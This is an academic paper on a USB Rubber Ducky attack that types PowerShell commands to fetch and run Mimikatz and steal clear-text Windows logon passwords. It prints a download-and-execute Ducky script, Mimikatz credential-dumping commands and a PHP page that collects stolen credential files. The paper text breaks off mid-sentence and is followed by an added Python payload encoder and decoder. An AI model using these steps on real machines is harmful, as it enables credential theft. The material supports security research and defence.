Hacking Experiment by Using USB Rubber Ducky Scripting

Benjamin Cannols
Department of CSIS, University of North Georgia
Dahlonega, Georgia 30597, USA

and

Ahmad Ghafarian
Department of CSIS, University of North Georgia
Dahlonega, GA 30597, USA

ABSTRACT

Leaving a computer unlocked while you are away, even for seconds, can give an attacker all the time needed to obtain personal information from it. This paper details the research and development of a USB Rubber Ducky script that obtains clear-text logon IDs and passwords from a Windows machine in mere seconds. Each stage is laid out in sections discussing Ducky script, PowerShell and Mimikatz, and re-enabling the vulnerability by breaking the attack into two parts for Windows 7 and later operating systems.

Keywords: USB Rubber Ducky, hacking, scripting, PowerShell, Mimikatz, Duck Toolkit.

1. INTRODUCTION

Nearly every computer, including desktops, laptops, tablets and smartphones, takes input from humans via a keyboard. This is possible because the ubiquitous USB standard includes a specification known as Human Interface Device (HID). Practically, this means that any USB device claiming to be a keyboard HID will be automatically detected and accepted by most modern operating systems, including Windows, Mac OS, Linux and Android.

The USB interface is generally a dangerous attack vector. In many organizations the use of USB flash drives is restricted because of their potential for use as a hacking tool. Examples of USB storage serving as a malware delivery mechanism are provided in research papers such as [3, 7, 8, 9]. Recently an even more insidious form of USB-based attack has emerged, known as BadUSB [2, 5]. A BadUSB device registers as multiple device types, allowing it to take covert actions on the host machine. For example, a USB flash drive could register itself as both a storage device and a keyboard, enabling it to inject malicious scripts.
This functionality is present in the Rubber Ducky penetration testing tool. Unfortunately, because USB device firmware cannot be scanned by the host machine, antivirus software cannot detect or defend against this attack. The problem is not limited to dubious flash drives: any device that communicates over USB is susceptible to this kind of attack. Moreover, existing USB security solutions, such as whitelisting individual devices by their serial number, are not adequate against malicious firmware that can make spurious claims about its identity during device enumeration.

66 SYSTEMICS, CYBERNETICS AND INFORMATICS

Standard USB devices are too simplistic to reliably authenticate, and secure devices with signed firmware that could permit authentication are rare, leaving it unclear how to defend against this new attack.

There are several methods by which a hacker or penetration tester can penetrate a machine, such as social engineering or exploiting vulnerabilities of the system. One practical strategy used by hackers is to plug a USB stick into a machine. This can be done with a USB device that the victim's computer detects as a HID (this is BadUSB), running code without the knowledge or consent of the victim. For example, if the user is away for lunch and has left his or her computer unattended, the hacker can plug the USB device into the victim's machine for malicious purposes.

Several attempts have been made by researchers to mitigate the dangers of hacking a machine via BadUSB. One such method is provided by Vouteva, who gave a proof of concept for the feasibility and deployment of BadUSB by using an Arduino Micro as a replacement for a BadUSB device.

In this paper we present the details of our approach to penetrating a Windows machine via the USB Rubber Ducky and scripting.
The mechanism allows a hacker to attack an unattended machine and retrieve sensitive information such as the user identification and clear-text password from the victim machine. We utilize several tools and technologies, including PowerShell, Mimikatz, a scripting language, a web server and PHP.

The rest of this paper is organized as follows. In section 2 we review the literature. Section 3 covers keylogger-enabled USB devices and other USB-related hacking mechanisms. The tools and technologies used in this research are described in section 4. Section 5 discusses the attack method and its implementation. The conclusion appears in section 6. Section 7 presents references.

2. LITERATURE REVIEW

In this section we explain some of the previous research in both the use of USB as an attack vector and the mechanisms for preventing USB-related attacks.

VOLUME 15 - NUMBER 2 - YEAR 2017
ISSN: 1690-4524
At Black Hat 2014, Nohl and Lell presented USB attack scenarios using BadUSB. The authors demonstrated that it is possible to use a USB device to redirect the user's DNS queries to an attacker's DNS server. In related work, Kamkar demonstrated a Teensy USB microcontroller configured to install a backdoor and change the DNS settings of an unlocked machine. More recently, a method of using a BadUSB has been developed by Nikhil Mittal (SamratAshok) in a tool called Kautilya. The tool has functionality such as information gathering and script execution, which leads to compromise of the victim machine.

It is not uncommon for people to leave their computers unattended, even if only for a few minutes. These few minutes are all it takes for usernames and passwords to be stolen by a malicious hacker using the USB Rubber Ducky or a similar tool. Whether it is a local account or a Microsoft account, the vulnerability exists in Windows and many other operating systems. Clear-text passwords are held in the computer's main memory and can be extracted using a program called Mimikatz, designed by Benjamin Delpy. One of many functions included in Mimikatz is the sekurlsa module, which specifically targets logon passwords and hashes.

With the aim of mitigating the risks posed by USB devices, the authors of one study built a BadUSB device and tested it in a controlled OS environment. Based on the results of their tests, they make recommendations on how to control the security of a machine.

This research exploits a Windows vulnerability using the USB Rubber Ducky. For this project the victim machine runs Windows 7 with Windows Defender as its antivirus, signed in to a Microsoft account owned by the victim.
In another published research paper the authors exploit several USB features to establish a rogue HTTP channel used to leak data stored on the device's disk to an Internet back end.

To mitigate the dangers of keylogger-enabled USB devices, the authors of another study built a method called USBWall with the aim of preventing such an attack. They compared USBWall with commercially available antivirus products and report that, in their controlled environment, USBWall is comparable to commercial antivirus software.

In the next section we describe the details of the tools and technology needed to construct and launch an attack.

3. USB KEYLOGGING

Keylogger software has the capability to record every keystroke a user makes to a log file. It can record information such as user IDs, passwords, instant messages and e-mail. Details of keylogger performance, and whether keyloggers need administrative access to the target machine, are discussed in the literature. In recent years there has been hardware development that enhances the task of keylogging. In this section we describe the specification of one such piece of hardware, which we use in this research.

The USB Rubber Ducky was developed by Hak5. This USB key includes a 60 MHz programmable microcontroller and a microSD slot. It behaves like a keyboard but looks like a USB flash drive, and it can easily be hidden in a computer port. Another feature of this device is that it is not visible in Task Manager; its power consumption could, however, be revealed by physical measurements. To use the USB Rubber Ducky we need physical access to the victim's machine, and we need to write the malicious payload to be injected by the device.

Computers inherently trust devices that claim to be a HID. It is through these devices that humans interact with and accomplish their daily tasks on all computers, including desktops, laptops, tablets and smartphones.
The USB Rubber Ducky is a keyboard emulator disguised within a USB thumb drive case. It has been used by IT professionals, penetration testers and hackers since 2010 and has become the most widely used commercial keystroke injection attack platform in the business. Combined with its scripting language, payloads can be written and deployed.

4. TOOLS AND TECHNOLOGIES

We have employed several hardware and software tools to implement this project. This section outlines those tools and technologies.

4.1 Target Machine

For the target machine we use a physical machine running Windows 7 Ultimate Edition, 64-bit, with all patches applied and Windows Defender as the antivirus software.

4.2 USB Rubber Ducky Hardware

We use a USB Rubber Ducky (Hak5) as the attack medium. It looks like a USB flash drive and can be plugged into the victim's machine. The USB Rubber Ducky includes a 60 MHz programmable microcontroller and a microSD slot. Features of this device include behaving like a keyboard; it does not show in Task Manager, and its power consumption could only be revealed by physical measurements.

4.3 Scripting Language

To write the malware payload we use the Rubber Ducky scripting language. Scripts can be written in any common text editor such as Notepad. Each command is written on a new line, all in capitals, and may be followed by options. Commands can invoke keystrokes, key combinations or strings of text, as well as delays or pauses. The two most common commands are DELAY and STRING. DELAY is followed by a number that represents milliseconds; for example, the line "DELAY 2000" instructs the Rubber Ducky to wait two full seconds before proceeding to the next line. This is extremely important in making sure the script runs smoothly and reliably: the Ducky types extremely fast, and some computers cannot keep up, so this command prevents the Ducky from moving faster than the computer can follow. The STRING command instructs the Ducky to type the text that follows it.
It can accept a single character or many. The command WINDOWS (or GUI) emulates the Windows key. Figure 1 shows an example script which displays "Hello World! I am in your PC."
Figure 1 - An example of Rubber Ducky script

4.4 Duck Toolkit NG

The Duck Toolkit NG is an open-source penetration testing platform that allows the user to generate USB Rubber Ducky payloads for Windows, Linux, Mac OS X and many other popular operating systems. We can choose from pre-built payloads, create our own payloads and decode existing payloads. Using the toolkit requires administrative access, PowerShell and Internet access.

4.5 PowerShell

PowerShell is an object-oriented scripting language and interactive command-line shell for Microsoft Windows. PowerShell automates system tasks such as batch processing and is used to create systems-management tools for commonly implemented processes. Figure 2 shows an example Ducky script that uses PowerShell to download a file from a website and then execute it.

DELAY 3000
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe');
DELAY 100
STRING Start-Process "%TEMP%\bob.exe"
ENTER

Figure 2 - An example of PowerShell download-and-execute in Ducky script (the WebClient call, garbled in the source text, is reconstructed from the standard Hak5 download-and-execute payload)

4.6 Web Server

Since we are going to execute the malware remotely from the web, we need a web server with PHP capability to upload and download malware executable files.

4.7 Mimikatz

Mimikatz is an open-source utility that exposes credential information held by the Windows LSASS (Local Security Authority Subsystem Service) through its sekurlsa module, including plaintext passwords, Kerberos tickets and much more. Most antivirus tools detect the presence of Mimikatz as a threat and delete it, but it is possible to work around that. Mimikatz can be executed both locally from the command line and remotely. To run Mimikatz from the command line we need mimikatz.exe and sekurlsa.dll on the target machine. This approach is not desirable in this research because we want to use the USB Rubber Ducky and bypass the hard drive. To run it remotely, we first establish a connection to the server, then copy over sekurlsa.dll and run it. Mimikatz runs on all versions of Windows from XP forward. However, its functionality is somewhat limited in Windows 8.1 and 10: from Windows 8.1 onward (and on Windows 7 and 8 with KB2871997 installed and the WDigest UseLogonCredential registry value set to 0) the WDigest provider no longer keeps the clear-text logon password in LSASS memory, so sekurlsa::logonpasswords returns hashes but no plaintext until that setting is re-enabled and the user logs on again. Below is an example execution to look for passwords on a system; privilege::debug requests SeDebugPrivilege and only succeeds from an elevated (administrator) process, without which the sekurlsa commands fail.

privilege::debug
sekurlsa::logonpasswords

5. CREATING PAYLOAD AND LAUNCHING THE ATTACK

This section details the process of exploiting the Windows vulnerability by creating an attack payload that retrieves the user ID and password from the victim's machine. For this project, the victim machine runs Windows 7 with Windows Defender as its antivirus.

5.1 Using Ducky Script to Create the Payload

We used Ducky scripting, introduced in section 4.3, to write our own malware script in Notepad and saved it as a text file. This text file was then encoded into an inject.bin file. The following statement converts the script text file to a .bin file.

java -jar duckencode.jar -i payload.txt -o inject.bin

Once we had created the inject.bin file, we copied it onto the microSD card, which was then inserted into the USB Rubber Ducky hardware. At this point the Ducky is ready for the first part of the attack.

5.2 Configuring Mimikatz for File Upload/Download

The next step is to obtain a copy of the Mimikatz executable and upload it to a hosting service of your choosing, or to your own private web server. For this project we chose a Google Drive account to hold the executable. Once the file was uploaded we used a direct-link generator to obtain a download link for Mimikatz, since this is how it will be downloaded and run from PowerShell. Uploading the credentials was a little more involved. We created a PHP page (Figure 3) on our website to listen for the incoming file and save it.
The page receives the file and saves it in the current directory of the PHP file under a name of the form "Credentials VictimIPAddress CurrentDate mimikatz.log".

<?php
// Name the saved file "Credentials <client IP> <date> <original filename>".
$uploadDir  = 'Credentials' . ' ' . $_SERVER['REMOTE_ADDR'] . ' ' . date("Y-m-d H-i-s") . ' ';
$uploadFile = $uploadDir . basename($_FILES['file']['name']);
// Move the uploaded file from PHP's temporary location to the script's directory.
move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile);
?>

Figure 3 - PHP file for receiving uploaded files (the $ sigils and the move_uploaded_file call were lost in the source text and are restored here)

5.3 Required PowerShell Script

After the download and upload locations were set, we needed to determine the PowerShell scripting required. When the Rubber Ducky is plugged in, we are going to have to get
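The encoding step in section 5.1 (java -jar duckencode.jar -i payload.txt -o inject.bin) and the DELAY and STRING semantics of section 4.3 can be made concrete with a small encoder and decoder. The Python below is an added example written for this edit; it is neither the paper's code nor Hak5's duckencode.jar or the Duck Toolkit NG. It assumes the inject.bin layout used by the open-source Ducky encoder and firmware (two bytes per record: an HID keycode followed by a modifier byte, where keycode 0x00 marks a delay record whose second byte is milliseconds, so a DELAY is split into 255 ms chunks), a US keyboard layout, and one held modifier per key combination. Encoding a bare modifier press as the left modifier key's own HID usage ID (0xE0 to 0xE3) is an assumption. The sample script in the block is constructed for the example.

```python
"""Encode and decode USB Rubber Ducky scripts to/from inject.bin.

Added example (not the paper's code, not Hak5's duckencode.jar).
Record layout assumed from the open-source Ducky encoder/firmware:
  [keycode, modifier]  press that HID key with those modifier bits
  [0x00, n]            wait n milliseconds (DELAY split into <=255 ms records)
Only the US layout, REM, DELAY, STRING, a few named keys and a single held
modifier (GUI/WINDOWS, CTRL/CONTROL, ALT, SHIFT) are handled.
"""
import string

MOD_CTRL, MOD_SHIFT, MOD_ALT, MOD_GUI = 0x01, 0x02, 0x04, 0x08
_MOD_ORDER = (("GUI", MOD_GUI), ("CTRL", MOD_CTRL), ("ALT", MOD_ALT), ("SHIFT", MOD_SHIFT))
_MOD_BITS = {"GUI": MOD_GUI, "WINDOWS": MOD_GUI, "CTRL": MOD_CTRL,
             "CONTROL": MOD_CTRL, "ALT": MOD_ALT, "SHIFT": MOD_SHIFT}
# Assumption: a modifier pressed alone ("GUI" opens the Start menu) is sent
# as the HID usage ID of the left-hand modifier key.
_MOD_KEY = {"CTRL": 0xE0, "SHIFT": 0xE1, "ALT": 0xE2, "GUI": 0xE3}

# (keycode, modifier) for each printable character on a US keyboard (HID page 0x07).
_CHARS = {" ": (0x2C, 0)}
for i, ch in enumerate(string.ascii_lowercase):
    _CHARS[ch] = (0x04 + i, 0)
    _CHARS[ch.upper()] = (0x04 + i, MOD_SHIFT)
for i, (plain, shifted) in enumerate(zip("1234567890", "!@#$%^&*()")):
    _CHARS[plain] = (0x1E + i, 0)
    _CHARS[shifted] = (0x1E + i, MOD_SHIFT)
for plain, shifted, code in (("-", "_", 0x2D), ("=", "+", 0x2E), ("[", "{", 0x2F),
                             ("]", "}", 0x30), ("\\", "|", 0x31), (";", ":", 0x33),
                             ("'", '"', 0x34), ("`", "~", 0x35), (",", "<", 0x36),
                             (".", ">", 0x37), ("/", "?", 0x38)):
    _CHARS[plain] = (code, 0)
    _CHARS[shifted] = (code, MOD_SHIFT)
_NAMED = {"ENTER": 0x28, "ESCAPE": 0x29, "BACKSPACE": 0x2A, "TAB": 0x2B,
          "CAPSLOCK": 0x39, "DELETE": 0x4C, "RIGHTARROW": 0x4F,
          "LEFTARROW": 0x50, "DOWNARROW": 0x51, "UPARROW": 0x52}
_REV_CHARS = {v: k for k, v in _CHARS.items()}
_REV_NAMED = {v: k for k, v in _NAMED.items()}
_REV_MODKEY = {v: k for k, v in _MOD_KEY.items()}


def _key(token):
    """(keycode, modifier) for a one-character token or a named key like TAB."""
    return _CHARS[token] if len(token) == 1 else (_NAMED[token.upper()], 0)


def encode(script):
    """Return inject.bin bytes for a Ducky script given as a string."""
    out = bytearray()
    for raw in script.splitlines():
        cmd, _, arg = raw.lstrip().partition(" ")
        if not cmd or cmd == "REM":
            continue
        if cmd == "DELAY":
            ms = int(arg)
            while ms > 0:                          # one record per 255 ms
                out += bytes((0x00, min(ms, 255)))
                ms -= 255
        elif cmd == "STRING":
            for ch in arg:                         # trailing spaces are typed too
                out += bytes(_CHARS[ch])           # KeyError: not on the US layout
        elif cmd in _MOD_BITS:
            name = {"WINDOWS": "GUI", "CONTROL": "CTRL"}.get(cmd, cmd)
            if not arg.strip():
                out += bytes((_MOD_KEY[name], 0x00))
            else:
                code, extra = _key(arg.strip())
                out += bytes((code, _MOD_BITS[name] | extra))
        elif cmd in _NAMED:
            out += bytes((_NAMED[cmd], 0x00))
        else:
            raise ValueError(f"unsupported Ducky command: {raw!r}")
    return bytes(out)


def decode(blob):
    """Inverse of encode(). Adjacent delay records are summed and adjacent
    characters merged into one STRING: equivalent for the firmware, not
    always textually identical to the script that produced the bytes."""
    lines, delay, text = [], 0, ""

    def flush():
        nonlocal delay, text
        if delay:
            lines.append(f"DELAY {delay}")
        if text:
            lines.append("STRING " + text)
        delay, text = 0, ""

    for code, mod in zip(blob[0::2], blob[1::2]):
        if code == 0x00:                           # delay record
            if text:
                flush()
            delay += mod
        elif (code, mod) in _REV_CHARS:            # plain or shifted character
            if delay:
                flush()
            text += _REV_CHARS[(code, mod)]
        else:                                      # named key, bare modifier or combo
            flush()
            key = _REV_CHARS.get((code, 0)) or _REV_NAMED.get(code)
            if mod == 0 and code in _REV_MODKEY:
                lines.append(_REV_MODKEY[code])
            elif key is None:
                lines.append(f"REM unknown record {code:#04x} {mod:#04x}")
            elif mod == 0:
                lines.append(key)
            else:
                held = next(n for n, m in _MOD_ORDER if mod & m)
                lines.append(f"{held} {key}")
    flush()
    return lines


if __name__ == "__main__":
    # Constructed sample: open the Run box and start a hidden PowerShell.
    SAMPLE = "REM constructed test\nDELAY 300\nGUI r\nDELAY 100\nSTRING powershell -w hidden\nENTER\n"
    blob = encode(SAMPLE)
    print(blob.hex())
    print("\n".join(decode(blob)))
```

Running the module prints the hex of the encoded sample and the script recovered from it. The decoder is the same operation the Duck Toolkit NG performs when it "decodes existing payloads" (section 4.4), and it is what a responder would run over an inject.bin recovered from an unknown microSD card to see what it would have typed.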